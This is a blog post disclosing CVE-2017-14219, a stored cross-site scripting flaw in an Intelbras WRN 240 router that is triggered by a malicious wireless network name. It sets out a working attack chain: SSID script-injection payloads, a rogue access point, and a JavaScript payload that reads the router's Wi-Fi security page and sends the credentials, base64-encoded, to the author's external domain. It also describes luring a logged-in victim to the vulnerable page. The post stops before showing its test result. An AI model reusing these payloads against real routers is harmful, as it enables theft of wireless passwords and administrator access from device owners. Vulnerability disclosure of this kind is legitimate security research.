Router exploit: Getting Wireless Password and Administrator Session Without Being Connected on the Same Network.

4 min readFeb 14, 2018

[CVE-2017–14219] XSS IN INTELBRAS ROUTER WRN 240.

How it started:

Have I been trying to hack my router for some time, reasons? Just missing what to do, and sometimes lack of internet too, this was from attempts to upload with modified firmware to attempts to insert codes on the page by changing the wireless ID, until one day I observed the SSIDS of other wireless points in the list interception of wifi networks.

XSS:

The vulnerability is present in the Intel Wireless Router N 150Mbps WRN 240 (only version tested by me so far) on the router search page to use as a bridge.

URL: "http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm"

The router receives the SSID from the networks and then shows it on the screen without any type filter or sanitize *, obeying only the limit of 32 characters of the wireless. The vulnerable page is not active by default on the router, the user (victim) would have to activate it in the AP settings, but luckily (of course), we just need the logged in user to access the html where the system shows the networks wireless devices that are within reach. Action that would not be difficult for someone smart.

To raise the AP I used another router that I had, but nothing that an airbase-ng would not solve. I changed my SSID to:

An attempt that did not succeed, but changed again to
</script><script>alert(‘xss’) where the tag would close the first </script> and start a new one, taking advantage of the original <script> tag at the end of the file.

Now that we have our xss, let’s go to the part that really matters. Obeying the 32-character limit of the wireless SSID, a way to inject long codes into the page would be importing from somewhere else, so I changed the SSID to <script src=‘// elb.me’> “elb.me” is my domain that I am using to save payloads.

We know that to access the index of a page does not necessarily need /index.*** in the end, so I added my script in the index of “elb.me” In a technique of theft of cookies, we usually use a script in php which takes what is passed by GET and saves it to a log file, it will not be much different from what we’re going to do. The script in PHP I configured in https://elb.me/cookie.php?ck= “logs are saved in https://elb.me/cookie.txt

The router saves the password in an ajax located on the page http://10.0.0.1/userRpm/WlanSecurityRpm.htm we only need the source of that page to get the credentials In the “elb.me” index I inserted a script in XMLHttpRequest, which allows you to request the source of this page and send it to our PHP receiver.

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
       alert(rawFile.responseText);
       var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
       //  selects the part of the page with the credentials
       new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
       // sends the credentials encoded in base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//take the page source /popupSiteSurveyRpm.htm
rawFile.send();

Now that we have our payload, we just suburm an AP and wait for someone to open the router page, or we can send the direct access link “http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm".

Testing on the page I get the following result: